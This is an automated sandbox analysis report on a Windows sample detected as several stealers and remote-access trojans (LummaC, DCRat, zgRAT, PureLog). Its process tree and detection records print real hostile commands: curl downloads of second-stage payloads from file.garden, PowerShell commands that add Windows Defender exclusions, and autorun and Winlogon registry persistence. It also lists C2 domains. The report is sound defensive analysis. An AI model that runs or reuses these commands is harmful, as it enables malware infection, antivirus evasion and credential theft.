Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
seoI30IZZr.exe

Overview

General Information

Sample name:seoI30IZZr.exe
renamed because original name is a hash value
Original sample name:26406c587a518c9b6ab8fd95252cbb347b853f9f5fd0f2b287f8bcd2d9905e34.exe
Analysis ID:1522824
MD5:d0e53e2a0bef6c93e0ccad47a650079d
SHA1:8e69fc482c058749cc7974e94ad7d571fca6ccf2
SHA256:26406c587a518c9b6ab8fd95252cbb347b853f9f5fd0f2b287f8bcd2d9905e34
Tags:exezelensky-topuser-JAMESWT_MHT
Infos:

Detection

LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to resolve many domain names, but no domain seems valid
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Electron Application Child Processes
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • seoI30IZZr.exe (PID: 4780 cmdline: "C:\Users\user\Desktop\seoI30IZZr.exe" MD5: D0E53E2A0BEF6C93E0CCAD47A650079D)
    • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3456 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 3832 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • kdmapper.exe (PID: 2616 cmdline: "C:\Windows\Speech\kdmapper.exe" MD5: C85ABE0E8C3C4D4C5044AEF6422B8218)
      • wscript.exe (PID: 5480 cmdline: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 6496 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • msedge.exe (PID: 4900 cmdline: "C:\Edge/msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
            • csc.exe (PID: 4200 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • csc.exe (PID: 5072 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • powershell.exe (PID: 3848 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 5056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WmiPrvSE.exe (PID: 2736 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • powershell.exe (PID: 6864 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7160 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FVbPldJoKd.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 5992 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • PING.EXE (PID: 3148 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
              • WmiPrvSE.exe (PID: 5656 cmdline: "C:\Users\user\AppData\Local\WmiPrvSE.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
          • conhost.exe (PID: 5212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4200 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 4424 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 1288 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • physmeme.exe (PID: 5064 cmdline: "C:\Windows\Speech\physmeme.exe" MD5: D6EDF37D68DA356237AE14270B3C7A1A)
      • conhost.exe (PID: 708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 5072 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cvtres.exe (PID: 5992 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9270.tmp" "c:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • RegAsm.exe (PID: 3724 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • msedge.exe (PID: 1856 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • msedge.exe (PID: 7140 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • cmd.exe (PID: 6732 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xPfNd2AH1w.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 4568 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
    • PING.EXE (PID: 4024 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
    • WmiPrvSE.exe (PID: 3484 cmdline: "C:\Users\user\AppData\Local\WmiPrvSE.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
  • msedge.exe (PID: 1836 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
    • cmd.exe (PID: 7156 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 5308 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7060 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cmd.exe (PID: 6264 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Jcydu7dUmM.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 6280 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": ["coursedonnyre.shop", "appleboltelwk.shop", "tiddymarktwo.shop", "surveriysiop.shop", "strappystyio.shop", "captainynfanw.shop", "tearrybyiwo.shop", "tendencerangej.shop", "fossillargeiw.shop"], "Build id": "1AsNN2--5899070203"}
SourceRuleDescriptionAuthorStrings
C:\Edge\msedge.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\Edge\msedge.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\Users\user\AppData\Local\WmiPrvSE.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Users\user\AppData\Local\WmiPrvSE.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Windows\Speech\kdmapper.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            00000005.00000003.1497197770.000000000696D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000005.00000003.1497756532.00000000052BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000010.00000000.1654958130.0000000000122000.00000002.00000001.01000000.0000000D.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000010.00000002.1726451234.0000000012879000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: msedge.exe PID: 4900JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Click to see the 2 entries
                      SourceRuleDescriptionAuthorStrings
                      5.3.kdmapper.exe.530c6cf.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        5.3.kdmapper.exe.530c6cf.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          5.3.kdmapper.exe.69bb6cf.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            5.3.kdmapper.exe.69bb6cf.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              16.0.msedge.exe.120000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                Click to see the 5 entries

                                System Summary

                                barindex
                                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Edge\msedge.exe, ProcessId: 4900, TargetFilename: C:\Users\user\AppData\Local\WmiPrvSE.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4900, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', ProcessId: 3848, ProcessName: powershell.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\WmiPrvSE.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 4900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\user\AppData\Local\WmiPrvSE.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 4900, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4900, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline", ProcessId: 4200, ProcessName: csc.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4900, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', ProcessId: 3848, ProcessName: powershell.exe
                                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4900, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', ProcessId: 3848, ProcessName: powershell.exe
                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\seoI30IZZr.exe", ParentImage: C:\Users\user\Desktop\seoI30IZZr.exe, ParentProcessId: 4780, ParentProcessName: seoI30IZZr.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, ProcessId: 3456, ProcessName: cmd.exe
                                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Speech\kdmapper.exe" , ParentImage: C:\Windows\Speech\kdmapper.exe, ParentProcessId: 2616, ParentProcessName: kdmapper.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , ProcessId: 5480, ProcessName: wscript.exe
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Edge\msedge.exe, ProcessId: 4900, TargetFilename: C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4900, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', ProcessId: 3848, ProcessName: powershell.exe

                                Data Obfuscation

                                barindex
                                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4900, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline", ProcessId: 4200, ProcessName: csc.exe
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:16.819790+020020560361Domain Observed Used for C2 Detected192.168.2.8507411.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:16.793557+020020560401Domain Observed Used for C2 Detected192.168.2.8554611.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:16.858485+020020560421Domain Observed Used for C2 Detected192.168.2.8506701.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:16.845073+020020560461Domain Observed Used for C2 Detected192.168.2.8557581.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:16.869633+020020560521Domain Observed Used for C2 Detected192.168.2.8591611.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:16.780192+020020560541Domain Observed Used for C2 Detected192.168.2.8585401.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:16.808005+020020560561Domain Observed Used for C2 Detected192.168.2.8535631.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:16.832660+020020560581Domain Observed Used for C2 Detected192.168.2.8613291.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:19:16.762080+020020561721Domain Observed Used for C2 Detected192.168.2.8550291.1.1.153UDP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: seoI30IZZr.exeAvira: detected
                                Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
                                Source: C:\Edge\L6lFlVnd0szYUYb26bZc.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\Windows\Speech\kdmapper.exeAvira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Edge\msedge.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: C:\Users\user\Desktop\AznuGYbp.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                Source: C:\Users\user\AppData\Local\Temp\FVbPldJoKd.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Users\user\Desktop\KiGKqBgX.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Users\user\Desktop\EagcoYZU.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                Source: C:\Users\user\Desktop\OJAsYAeC.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: 12.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["coursedonnyre.shop", "appleboltelwk.shop", "tiddymarktwo.shop", "surveriysiop.shop", "strappystyio.shop", "captainynfanw.shop", "tearrybyiwo.shop", "tendencerangej.shop", "fossillargeiw.shop"], "Build id": "1AsNN2--5899070203"}
                                Source: C:\Edge\msedge.exeReversingLabs: Detection: 73%
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeReversingLabs: Detection: 73%
                                Source: C:\Users\user\Desktop\ERJdElGX.logReversingLabs: Detection: 29%
                                Source: C:\Users\user\Desktop\IlfCUBRc.logReversingLabs: Detection: 29%
                                Source: C:\Users\user\Desktop\KiGKqBgX.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\OJAsYAeC.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\oYbYVUjG.logReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\rWfFWfLI.logReversingLabs: Detection: 25%
                                Source: C:\Windows\Speech\kdmapper.exeReversingLabs: Detection: 68%
                                Source: C:\Windows\Speech\physmeme.exeReversingLabs: Detection: 60%
                                Source: seoI30IZZr.exeReversingLabs: Detection: 55%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                Source: C:\Windows\Speech\kdmapper.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\oYbYVUjG.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\jsWPmlvb.logJoe Sandbox ML: detected
                                Source: C:\Edge\msedge.exeJoe Sandbox ML: detected
